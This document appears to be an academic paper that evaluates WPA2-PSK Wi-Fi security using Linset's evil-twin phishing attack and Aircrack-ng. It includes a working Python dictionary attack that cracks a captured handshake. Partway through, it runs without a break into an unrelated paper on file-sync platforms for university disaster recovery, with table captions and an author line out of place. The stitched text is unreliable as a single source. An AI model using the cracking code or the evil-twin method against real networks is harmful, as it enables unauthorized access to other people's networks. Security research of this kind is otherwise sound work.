Evaluation of the WPA2-PSK wireless network security protocol using the Linset and Aircrack-ng tools

Due to the emergence of new intrusion techniques and technologies, wireless network protocols have become obsolete; for this reason, this research seeks to breach and evaluate the security of the WPA2 protocol, which is widely used by Colombian service providers. The first section of this paper introduces the WPA2 protocol by describing its operation and the potential attacks it may suffer; the second part details the methodology used to collect the test data and to carry out the evaluation necessary for the preparation of this article. In addition, we present Linset and Aircrack-ng, the wireless network auditing tools selected to assess the security of the protocol. Finally, we show the results and conclusions.


I. Introduction
Cyber-attacks are a growing trend in modern Colombian society. These attacks affect users' information on the Internet [1]: the traffic generated when files move between a computer or cell phone and the Internet is encrypted to hide the frames and packets exchanged between the modem and the sending device. For this reason, it is necessary to understand how these packets, which carry information critical to the security of our data, are attacked.

A. What is WPA2-PSK?
Among the existing wireless networks that allow interconnecting two or more computers to transmit data, the best known are WPAN (Wireless Personal Area Network), WLAN (Wireless Local Area Network), WMAN (Wireless Metropolitan Area Network), and WWAN (Wireless Wide Area Network). Each network has an associated protocol and IEEE standard that allow the review and the subsequent communication in a local or global network. We will focus on the WLAN wireless network with the WPA2-PSK protocol, based on the IEEE 802.11i standard ratified on June 24, 2004 [3][4][5].
WPA (Wi-Fi Protected Access) originated in the problems detected in WEP, a previous security system created for wireless networks [6]. WPA2-PSK (PSK stands for Pre-Shared Key) is the evolution of the WPA protocol; it implements an algorithm that takes a key of 8 to 63 characters as a parameter and derives a new key from this value [6].
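As a concrete illustration (our sketch, not part of the paper's tooling), the master key that WPA2-PSK derives from the 8-to-63-character passphrase is the Pairwise Master Key (PMK), computed deterministically with PBKDF2-HMAC-SHA1 over the passphrase and the network's SSID, using 4096 iterations and a 256-bit output:

```python
import hashlib

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit Pairwise Master Key (PMK) from a WPA2-PSK
    passphrase (8-63 characters) and the SSID, via PBKDF2-HMAC-SHA1
    with 4096 iterations, as standardized for WPA2-PSK."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(),
                               ssid.encode(), 4096, 32)

# Using the test network described later in this paper:
pmk = derive_pmk("@Prueba@", "PruebaArticulo")
print(pmk.hex())
```

Note that this derivation is deterministic: anyone who knows the passphrase and the SSID obtains the same PMK, which is precisely what makes dictionary attacks on captured handshakes possible.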
The operation of WPA2-PSK involves the following steps (Fig. 1): 1. The authenticator sends a message to the supplicant with a randomly generated value (an arbitrary value with no special meaning). This message is known as the authenticator nonce, or simply anonce, because it contains a field called nonce whose value is generated randomly by the authenticator, as shown in Fig. 1, which was captured with Wireshark. In addition, the Replay Counter is an indicator that allows the authenticator and the supplicant to know the number of packets that have been previously sent [6].
2. The supplicant receives the message and replies with another message called snonce (supplicant nonce), which is basically of the same type as the received anonce packet, but contains a different, randomly generated nonce [6].
3. With the previous information, the supplicant creates the Pairwise Transient Key (PTK); this step is extremely important and deserves special attention, because it is where the "magic" of PSK and the dynamic generation of keys take place, a mechanism originally introduced to improve on WEP's security against fairly widespread attacks. PTKs are the keys that protect the packets exchanged between the supplicant and the authenticator; they are generated from the Pairwise Master Key (PMK), which in turn derives from the PSK; that is, each PTK is generated dynamically by the supplicant and the authenticator [6].
4. The procedure for generating the PTK key is very important, hence, understanding it is necessary. The PTK is generated from the PMK using a key-derivation function that takes the following parameters: 1) the anonce, the packet generated by the authenticator containing its random value; 2) the snonce, the packet generated by the supplicant containing its random value; 3) the authenticator's MAC address; and 4) the supplicant's MAC address [6].
5. The supplicant sends a packet to the authenticator with the snonce message and a MIC field (encrypted using the Michael integrity mechanism) that allows an integrity and consistency check of the packet; this field is generated by the supplicant using the PTK and the PMK [6].
6. With the packet sent by the supplicant in step 5, the authenticator derives the PTK key, since it already knows the fields necessary for the calculation: the PMK, which is the same for both the supplicant and the authenticator, the anonce, the snonce, and the MAC addresses of the authenticator and the supplicant [6].
7. Once the authenticator has generated the PTK with the fields received in the previous packet (with the snonce field), it tries to generate the MIC field, since it now has the same PTK and PSK as the supplicant. The MIC generated by the authenticator and the supplicant must be the same; if that is the case, the authenticator sends the supplicant a "Key Installation" message, identifiable by the "Install" flag, which can be seen in the third packet exchanged in the authentication process [6].
8. The supplicant sends the authenticator a "Key Install Acknowledgment" message, which simply confirms that, in this session of packet exchange, the same PTK generated by the client and the AP was used. This packet contains a "Key ACK" field with a value of zero, indicating that it is the last message sent in the authentication process between the supplicant and the authenticator [6].
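The key-derivation steps above can be sketched in Python (an illustrative reconstruction of the standard mechanism, not the paper's code). The PTK is expanded from the PMK with the IEEE 802.11i PRF, which feeds HMAC-SHA1 the label "Pairwise key expansion" plus the two MAC addresses and the two nonces in sorted order; the first 16 bytes of the PTK (the Key Confirmation Key, KCK) then key the MIC over each EAPOL frame, which is what lets each side verify the other in steps 5-7 (WPA2 uses HMAC-SHA1 here; the older TKIP mode used HMAC-MD5):

```python
import hmac
import hashlib

def prf_512(pmk: bytes, a_mac: bytes, s_mac: bytes,
            anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: expand the PMK into a 64-byte PTK.
    MACs and nonces are concatenated in sorted order, so both sides
    compute the same PTK regardless of which role they play."""
    b = (min(a_mac, s_mac) + max(a_mac, s_mac)
         + min(anonce, snonce) + max(anonce, snonce))
    blob = b""
    for i in range(4):  # 4 x 20-byte HMAC-SHA1 outputs >= 64 bytes
        blob += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]),
                         hashlib.sha1).digest()
    return blob[:64]

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over an EAPOL frame, keyed with the first 16 bytes of the
    PTK (the KCK); truncated to 128 bits as in the handshake."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
```

Because the inputs are sorted before concatenation, the supplicant and the authenticator arrive at an identical PTK even though each generated only its own nonce.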
Once the operation of the WPA2-PSK protocol is understood, we can perform different types of attacks to detect its vulnerabilities.

B. Types of attack
Modems that create wireless networks for their users are vulnerable to several types of attack. The most common attacks are the following:
1. SYN saturation attack: floods network traffic; in other words, a single individual makes a large number of requests to the server, in this case the modem, which denies access to the rest of its users [7].
2. DoS attack: a denial-of-service attack [8].
3. DDoS attack: an extension of the DoS attack that is launched from multiple connection points [8].
4. Identity theft: phishing is based on social engineering and exploits the fact that humans make the greatest errors [8].
5. Man-in-the-middle attack: diverts packet information, either altering it and returning the modified data, or simply inspecting the information handled by the target user [8].

II. Methodology
A. Software
1) WIFISLAX. Operating system based on Linux that can be used as a live CD or booted from a USB drive; it was designed by www.seguridadwireless.net and adapted for wireless auditing [9]. This OS is an auditing distribution for wireless networks that bundles the set of tools needed to operate.
Alberto Acosta-López - Elver Yesid Melo-Monroy - Pablo Andrés Linares-Murcia
2) Linset. Application to audit wireless networks that does not use decryption dictionaries to obtain the network access code. With this tool, the cooperation of the user, who is unaware of the attack, is of vital importance, which implies that the user has little or no knowledge of computer security. Linset creates a fake AP with the same ESSID as the one under attack and without any type of encryption; in addition, it de-authenticates the legitimate clients from the AP, preventing them from authenticating, and making them access the AP created by this tool and enter the network password [10].
3) Operation. This tool attacks the modem, preventing network users from connecting, and then creates a fake network to which users will connect and provide the network password. Once the password is obtained, the fake network is closed and normal modem operation is restored.

4) Aircrack-ng. A complete suite of tools for auditing Wi-Fi wireless networks. It focuses on different areas of wireless network security: packet monitoring, attacking, testing, and cracking [11].

5) VMware Workstation PRO (trial version). This tool is one of the industry-standard products for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers, and businesses use Workstation Pro and Workstation Player to improve agility, productivity, and security [12].

6) Windows 8 Pro (trial version). Operating system created by Microsoft; we used the trial version of Windows 8 Pro for the development of this research.

B. Hardware
Modem ZTE ZXV10 W300E (for home network use)
Desktop computer: Core i7, 16 GB RAM
Network adapter TP-LINK WN725 (does not support monitor mode)
Network adapter TP-LINK WN722N (supports packet monitoring)

C. Methods
The modem was configured to generate a wireless network, to use the WPA2-PSK protocol, and to set the password for accessing the newly created network. In this case, the network was called PruebaArticulo, and the password was @Prueba@.
We performed the audit using a man-in-the-middle attack and a DoS attack combined with decryption dictionaries (known as brute force), and ran ten tests for each technique.
First, we carried out the brute-force attack: an information packet containing the wireless network's encrypted access key was captured. Afterwards, we carried out the impersonation attack, in which a third network that impersonates the original one is created, and the victim submits the password of his/her wireless network to it. In both attacks, we evaluated anonymity and the waiting time to obtain access.
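The brute-force technique described above can be sketched as follows (a simplified Python illustration of what Aircrack-ng automates; the function name and test values are ours): each candidate passphrase from the dictionary is turned into a PMK, then into a PTK, and the resulting MIC is compared against the one captured in the 4-way handshake.

```python
import hashlib
import hmac

def crack_handshake(ssid, dictionary, a_mac, s_mac, anonce, snonce,
                    eapol_frame, captured_mic):
    """For each candidate passphrase: derive PMK -> PTK -> MIC and
    compare with the MIC captured from the 4-way handshake. Returns
    the passphrase on a match, or None if the dictionary is exhausted."""
    for candidate in dictionary:
        # PMK: PBKDF2-HMAC-SHA1 over passphrase and SSID, 4096 rounds
        pmk = hashlib.pbkdf2_hmac("sha1", candidate.encode(),
                                  ssid.encode(), 4096, 32)
        # PTK: IEEE 802.11i PRF over sorted MACs and nonces
        b = (min(a_mac, s_mac) + max(a_mac, s_mac)
             + min(anonce, snonce) + max(anonce, snonce))
        ptk = b"".join(
            hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]),
                     hashlib.sha1).digest() for i in range(4))[:64]
        kck = ptk[:16]  # Key Confirmation Key signs the EAPOL frame
        mic = hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
        if mic == captured_mic:
            return candidate  # password found
    return None
```

The 4096 PBKDF2 iterations per candidate are what make this attack expensive, which matches the hours-long durations reported for Aircrack in Table 2.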

III. Results
This study allowed us to better understand the use of the auditing tools. The focus of our analyses was to highlight the vulnerabilities of the security protocol; for this, we studied the following items: time to obtain the password, method, and visualization of the attack (Table 1).

Table 1. Comparison between the Linset and Aircrack tools
Table 2 shows the length (in hours) of each of the 10 tests conducted with the Aircrack tool, whereas Table 3 shows the length (in minutes) of the attacks with the Linset tool. The network attack using Linset was one of the most effective; however, this is not because of the results themselves, but because of the lack of defense methods. Therefore, as long as the attacker has a good network card, the attack is imminent and difficult to avoid if the user is unaware of it.

IV. Discussion
Although companies in Colombia like Digiware are dedicated to computer security, no system is 100 % safe. What is really important for an adequate protection of our data is education; however, how do we obtain this knowledge? Are the supplier companies willing to give us basic training, at least to change the password of our wireless network? The truth is that the knowledge we have today quickly becomes obsolete, particularly in technology; what before lasted a little over a year nowadays only lasts for weeks or sometimes days. In the current information age, it is necessary to have a minimum of security in our data, which is why a question arises: who will train us for this?
This article presented two tools to evaluate the security of our wireless networks, and the way the WPA2 security protocol works. Additionally, we provided elementary knowledge about the different types of attacks that currently affect wireless networks. Evidently, besides computer viruses, attacks on the network infrastructure are problematic because they allow access to users' sensitive data.

V. Conclusions
Linset employs more advanced techniques than Aircrack, exploiting the user's naivety to appropriate the network's password. It also uses a technique of creating alternative networks, contrary to Aircrack, which collects identification packets; in terms of time, the Aircrack method is more expensive than Linset. Aircrack attacks on vulnerable networks are totally unavoidable; therefore, it would be necessary to find a solution. Each tool is limited in a different way with respect to time: a Linset attack is limited by the patience of the user, who usually does not tolerate more than 15 minutes without giving up the password, whereas an Aircrack attack is limited by the power of the attacking machine; depending on its capacity, the search can take from days to weeks, or even up to one month.
Depending on the management of the company, it is necessary to train the employees to identify attacks on the networks, and thus avoid providing relevant information that lets the attacker access the network. A mechanism to increase the security of entry to a private Wi-Fi network is authentication through the devices' MAC addresses. This mechanism allows only known devices to access the network, providing an additional degree of security.

I. Introduction
The inclusion of Information and Communication Technologies (ICT) in education has taken a slow and uneven pace, due to both economic and human-resource constraints. As a consequence, in disaster situations there is no response that allows continuing the processes linked to administration, documentation, tracking, reporting, and delivery of educational courses. Given this, the computational cloud promises to reduce costs and offer high availability and long-term continuity [1]. The cloud is considered a model of flexible delivery of ICT services that provides systems and networks with high transfer rates [2].
The computational cloud arises from the need to build less complex IT infrastructures in comparison with traditional technological schemes [3][4][5][6], in which technicians install, configure, and upgrade the software systems; hence, infrastructure assets tend to become obsolete quickly. Therefore, using these computing platforms is a solution for IT users, as an intelligent technology that responds to the Smart Education model by offering a robust infrastructure environment.
The vision of Smart University deploys a set of services that focus on large-scale interactions, conceiving the university as a deeply dynamic and innovative place.
To achieve this, Smart Education has its foundations on smart devices and emerging technologies [7] that respond to mobile learning. When using devices, it focuses on learner mobility, in contrast to traditional types of education [8]. Ubiquitous technology focused on learning can be used anytime and anywhere, without limitations of time, location, or desktop or mobile environments. Thus, intelligent technologies such as the computational cloud promoted the appearance of Smart Education. In this way, the advent of the computational cloud has generated additional options for educators and students, providing them with the means to express their research, studies, and creativity in a distinctive way [9]. Its application not only alleviates the burden on educational institutions of managing complex IT infrastructure, but also leads to great cost savings [10].
The present study focused on the recovery of services in educational environments, such as storage, communications, sharing, and file synchronization, by combining elements of the computational cloud supported by the Smart Education theory, in particular Enterprise File Synchronization and Sharing (EFSS) systems. This allows us to respond to the particularities observed in disaster situations, such as the devastating earthquake of April 16, 2016, which left the education sector in the province of Manabí (Ecuador) out of operation due to the lack of a recovery plan for these eventualities of force majeure.
The rest of the article has been organized as follows: section 2 describes the state of art; section 3 synthesizes the applied research methods and techniques, as well as the activities carried out to bring the work to a successful conclusion; section 4 details the quantitative evaluation of the EFSS platforms; section 5 explains the start-up of the experiment; section 6 describes the experimental results of the EFSS implementations, and the execution of the developed routine in two EFSS instances, the measurement of the quality of use of the routine, and the discussion of the results obtained; finally, section 7 presents the conclusions and lines of future work based on the obtained results.

II. Related Work
In various sectors, the use of technology based on file sharing via the Internet, among the users of an organization and in collaboration with others, is becoming more and more prevalent [11]; therefore, a careful selection of the solution in terms of administration, security, and costs is required.
In education, cloud-computing services provide a faster recovery and discovery of information, allowing students to store and share documents in a more flexible environment, and giving students and instructors remote access to materials [12]. Computational clouds, through services such as Google Drive, Dropbox, SkyDrive, and iCloud, offer the user the possibility of storing, reviewing, and accessing files synchronized among various devices [12], with a limiting use license that requires, among other aspects, a subscription fee and content restrictions. The main educational activities conducted in the computational cloud focus on discussing, planning, and using the interactive applications and services that are carried out in colleges and universities around the world [4,13].
Enterprise file synchronization and sharing services for educational environments in case of disaster

With the advent of computational clouds, disaster recovery from data loss is now possible for the education sector. The traditional techniques used for disaster recovery are very expensive, and the education sector cannot afford them due to limited funds [10]. Scientific documentation on free computational clouds is scarce, and it is even more limited on disaster recovery on a free computational cloud. The application of cloud computing in the educational field is at an early stage in the scientific literature [14].

III. Research Design
This research focused on implementing a recovery plan in case of disasters by using free computational clouds.
To achieve this, we applied the Action Research methodology, framed in a bibliographical, descriptive analysis and a quantitative/qualitative evaluation.
In particular, we analyzed several free computational clouds and their relation to the processes that contribute to executing educational programs, by diagnosing the environment affected by the earthquake of April 16, 2016, at the Universidad Laica Eloy Alfaro de Manabí (ULEAM), Ecuador.
The quantitative data were collected from experimental tests performed on each EFSS, which culminated in the development of a Shell script routine under the methodology of Experimental Software Engineering, specifically evidence-based. The main purpose was to improve decision making regarding the development and maintenance of software, integrating the best current research evidence with practical experiences and human values [15].
To evaluate the EFSS, we carried out two activities. First, we evaluated and implemented three open-source options: Nextcloud, Pydio, and Seafile. Second, we prepared two test servers with the following characteristics: Intel(R) Xeon(R) CPU E3-1220 v3 @ 3.10 GHz with 4 cores; 4 GB of RAM; Ubuntu Server 14.04 with a 3.13.0-85 GNU/Linux kernel; and two hard drives of 1 terabyte each. Each EFSS presents a logical layer architecture (Fig. 1), where the client layer is the interface or front-end of the user, with the services offered by the application. Ubiquity is a feature present in EFSS, which allows access from anywhere and at any time.

IV. Quantitative and Qualitative Evaluation of the EFSS
According to a thorough review of the state of the art, there are more than 100 commercial EFSS solutions in the market [16]. However, because the university where the diagnosis was conducted is public, we framed the analysis in free-licensing EFSS.
Table 1 compares the characteristics of the EFSS in terms of synchronization and storage. The installation requirements of each EFSS centered on an Apache web server, and compatibility with databases such as MySQL and with the GNU/Linux operating system. The versions of the EFSS analyzed were (a) Nextcloud 11.0.3, (b) Seafile 6.0.9, and (c) Pydio 7.0.4; some of the EFSS depend on additional packages according to the programming language in which they were developed.
After implementing the EFSS, we installed the monitoring applications to obtain accurate data for the evaluation: (a) JMeter, an open-source application written in Java that tests the performance and functional behavior of Web applications; we used version 2.13.20 for GNU/Linux [17]; and (b) Cacti, the front-end for RRDTool, which stores data coming from the RRDTool database and displays it graphically. We also measured the number of concurrent users that each EFSS supported when executing the assigned requests.

The Disaster Recovery Plan intends to provide the authorities with the information necessary to resume the EFSS service in an appropriate and timely manner for the failure scenarios listed below, and includes a test period to make sure that the solution remains in operation, as well as the roles and responsibilities involved. The Disaster Recovery team, taking into consideration the current IT organization chart, is formed as shown in Fig. 4.

B. Usability of the routine
When selecting metrics on Quality of Use, we used log-monitoring applications on the main processes of the routine. The results showed that the developed routine meets the requirements and generates a high degree of satisfaction (Table 3). These results come from the following metrics:

C. Discussion
The data indicate that Nextcloud performed remarkably better than its competitors, which have restricted certain modules and have a technical team under a business structure, instead of the community and educational features found in Nextcloud. On the other hand, the lack of a module for synchronizing instances in Nextcloud was evident. This motivated the implementation of a routine that added this feature, which we later verified in terms of functionality and usability, yielding very satisfactory data (Table 3).
In general, the test plan contemplated three clearly differentiated milestones. The initial phase corresponded to the preparation of the necessary environment, and the implementation and configuration of the necessary tools. The next phase was the execution of the control tests, following the designed plan. The final phase was the data analysis, in which all the data obtained during the previous executions were studied and presented in such a way that they provide as much information as possible.
From there, we proceeded to develop a routine to synchronize and remove the backup instance, owing to the absence of this functionality in Nextcloud. Proof-of-concept tests were carried out and the usability was evaluated. As a final product, the Disaster Recovery Plan was elaborated.
The opportunities found in Nextcloud stem from the nature of the project, which is completely open source; this allowed us to detect a growth opportunity and thus develop a Bash routine to ensure the continuity of storage and synchronization services. However, this implies future development to incorporate an emergency and/or continuity module in the configuration panel of the EFSS.
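The study's Bash routine is not reproduced in the paper; as a hedged illustration of the idea it describes (a one-way mirror of new files from the main instance's data directory to the secondary server, run periodically, as in the recovery plan's 10-minute transfer assumption), a minimal Python sketch with hypothetical paths could look like:

```python
import shutil
from pathlib import Path

def sync_new_files(primary: Path, secondary: Path) -> list[str]:
    """Copy to the secondary instance any file that is missing there
    or older than its counterpart on the primary. Returns the relative
    paths of the files copied on this run."""
    copied = []
    for src in primary.rglob("*"):
        if not src.is_file():
            continue
        dst = secondary / src.relative_to(primary)
        if not dst.exists() or dst.stat().st_mtime < src.stat().st_mtime:
            dst.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(src, dst)  # copy2 preserves timestamps
            copied.append(str(src.relative_to(primary)))
    return copied
```

In practice the routine would be scheduled (e.g., via cron every 10 minutes) against the Nextcloud data directory, with the database backup and integrity check handled as separate steps, as the Disaster Recovery Plan's assumptions indicate.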

VII. Conclusions and Future Work
In the present study, we configured three EFSS computational clouds under free licensing, and evaluated them quantitatively by measuring the time they took to respond to all the requests and to each individual request, as well as the number of concurrent users supported and the consumption of CPU and RAM resources. The results of these tests determined that Nextcloud is the best EFSS to implement in an educational scenario, taking into account the impact it generates and its real-time collaboration features. Subsequently, given the absence of a synchronization functionality between Nextcloud instances, it was necessary to develop a routine that allows business continuity in the face of a disaster. This routine and the subsequent Disaster Recovery Plan were prepared based on the ISO/IEC 25000 and ISO 22301 standards. As future work, we plan to include the routine as a back-end package within the EFSS, for its implementation in GNU/Linux distributions.

Authors' Contributions
Delgado-Domínguez conducted the search, the compilation, and the analysis of the papers referenced in this article, and contributed to writing the manuscript. Fuertes-Díaz was the advisor of the project and supervised the development of the DRP. Sánchez-Gordón contributed to writing the manuscript and reviewed it. All authors read and approved the final manuscript.

The Disaster Recovery Plan considers the following failure scenarios:
• EFSS server hard drive failures
• Power failures of the data center or the servers' cold room
• Corrupt database
• No Apache (HTTP) service
• Total disablement of the data center, due to any type of disaster
During any of the above failures, the secondary server located outside the institution will be enabled, either in a national or an international data center. The recovery procedures and the estimated times for the RTO (Recovery Time Objective) and the RPO (Recovery Point Objective) are based on assumptions that need validation:
• Implementation of a secondary server outside the institution, with physical characteristics like those of the main server and identical software configurations
• Transfer of new files every 10 minutes from the main server to the secondary server
• Backup and verification of the integrity of the database
• The script generated for the transfer and treatment of the database produces alerts that should be taken seriously.

Table 2. Length (in hours, approx.) of an attack with Aircrack
Table 3. Length (in minutes, approx.) of an attack with Linset

Table 2 describes the critical services in the EFSS. Figure 7 depicts the average CPU consumption of each EFSS after 1, 5, and 15 minutes of execution, and Figure 8 details the average consumption of RAM memory for the execution of the 6000 assigned requests.

Table 3. Evaluation of the usability of the routine